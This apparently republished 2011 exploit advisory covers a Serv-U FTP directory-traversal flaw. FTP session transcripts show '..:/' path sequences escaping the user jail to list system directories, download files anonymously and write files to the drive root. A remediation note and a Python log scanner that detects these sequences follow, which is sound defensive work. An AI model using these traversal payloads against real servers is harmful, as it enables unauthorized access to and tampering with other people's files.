Serv-U FTP Jail Break (Unauthorized Directory Traversal and Arbitrary File Download)

2023-12-07

The programs (methods) provided on this site may be offensive in nature and are intended for security research and teaching only; use at your own risk!

[*]----------------------------------------------------[*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*]----------------------------------------------------[*]

/* sebug.net
By constructing ..:/ sequences, an attacker can traverse the server's directories and download arbitrary files.
Affected versions: 6.4, 7.1, 7.3, 8.2, 10.5
*/

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...

[*]----------------------------------------------------[*]

C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp (anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r-- 1 user group 0 Nov 12 21:48 .
dr--r--r-- 1 user group 0 Nov 12 21:48 ..
drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundation
drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications
drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files
drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer
drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources
d--------- 1 user group 0 Jul 8 16:12 InstallShield Installation Information
drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer
drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch
drw-rw-rw- 1 user group 0 Feb 12 2011 Java
drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting
drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express
drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL
drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw- 1 user group 0 Feb 12 2011 Sun
d--------- 1 user group 0 Jul 29 15:13 Uninstall Information
drw-rw-rw- 1 user group 0 Feb 5 2011 VMware
drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR
drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player
drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT
d--------- 1 user group 0 Feb 5 2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>

[*]----------------------------------------------------[*]

with write perms:

ftp> put foo.txt ..:/..:/..:/foobar    <<-- writes foo into root of partition

[*]----------------------------------------------------[*]

and as anonymous ftp:

ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s

[*]----------------------------------------------------[*]

This works too!!! :

220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s

[*]----------------------------------------------------[*]

Sometimes you need to give it the path:

ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>

@Sebug.net [ 2011-12-01 ]

Remediation: this class of issue can be prevented by configuring Serv-U's permissions. Be sure to pay attention to Serv-U's security settings.
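For defenders reviewing FTP command logs, the following is an added example (not part of the original advisory and not Serv-U code). It flags path arguments that contain a `..` component decorated with colons, covering both the `..:` and `:..` forms in the transcript, and reports whether the server's first reply accepted the command. The log line format, the sample lines and the names `scan` and `is_jailbreak_arg` are assumptions made for illustration.

```python
import re
# Constructed sample in an assumed format: "<session> C: <command>" / "<session> S: <reply>".
SAMPLE_LOG = r'''
0007 C: CWD /..:/..:/..:/..:/program files
0007 S: 250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
0007 C: CWD ..
0007 S: 250 Directory changed to /
0008 C: RETR ..:/..:/..:/..:/windows/system32/calc.exe
0008 S: 150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
0009 C: NLST -a ..:\:..\..:\*
0009 S: 550 Permission denied.
'''
LINE = re.compile(r'^(?P<sid>\S+) (?P<side>[CS]): (?P<text>.*)$')
PATH_CMDS = {"CWD", "LIST", "NLST", "RETR", "STOR", "APPE", "DELE",
             "MKD", "RMD", "RNFR", "RNTO", "SIZE", "MDTM"}

def is_jailbreak_arg(arg):
    """True if a path component is '..' decorated with colons ('..:' or ':..')."""
    for component in re.split(r'[\\/]', arg.replace('"', '')):
        for token in component.split():      # also skips option words such as "-a"
            if token != '..' and token.strip(':') == '..':
                return True
    return False

def scan(log_text):
    """Return (session, command, argument, accepted) per flagged command; accepted is
    True for a 1xx/2xx first reply, False for another reply, None if none was logged."""
    findings, pending = [], {}
    def flush(sid, accepted):
        if sid in pending:
            findings.append((sid, *pending.pop(sid), accepted))
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        sid, text = m['sid'], m['text']
        if m['side'] == 'C':
            flush(sid, None)                     # earlier flagged command got no reply
            cmd, _, arg = text.partition(' ')
            if cmd.upper() in PATH_CMDS and is_jailbreak_arg(arg):
                pending[sid] = (cmd.upper(), arg)
        else:
            flush(sid, text[:1] in ('1', '2'))   # first reply decides the outcome
    for sid in list(pending):
        flush(sid, None)
    return findings

if __name__ == '__main__':
    print(*scan(SAMPLE_LOG), sep='\n')
```

A finding with `accepted` set to `True` means the server acted on the path, so that host still needs the permission hardening described above. An ordinary `CWD ..` inside the user's home is deliberately not flagged.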
